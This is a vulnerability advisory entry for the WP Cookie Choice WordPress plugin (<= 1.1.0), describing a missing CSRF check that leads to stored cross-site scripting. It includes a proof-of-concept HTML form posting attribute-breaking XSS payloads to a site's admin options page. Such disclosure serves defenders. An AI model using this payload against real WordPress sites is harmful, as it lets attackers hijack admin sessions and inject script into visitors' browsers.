WordPress Plugin Vulnerabilities
WP Cookie Choice <= 1.1.0 - CSRF to Stored Cross-Site Scripting
Description
The plugin is lacking any CSRF check when saving its options, and do not escape them when outputting them in attributes. As a result, an attacker could make a logged in admin change them to arbitrary values including XSS payloads via a CSRF attack.
Proof of Concept
<html> <body> <form action="https://example.com/wp-admin/options-general.php?page=wp-cookiechoise" method="POST"> <input type="text" name="send" value="send"> <input type="text" name="cookiechoice_close" value=""> <input type="text" name="cookiechoice_more" value='" autofocus=autofocus onfocus=alert(String.fromCharCode(111,112,115)) e="'> <input type="text" name="cookiechoice_url" value="javascript:alert(String.fromCharCode(111,112,115))"> <input type="checkbox" name="cookiechoice_active" value="1" checked="checked"> <input type="submit" value="submit"> </form> </body> </html>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-09-20 (about 2 years ago)
Added
2021-09-20 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)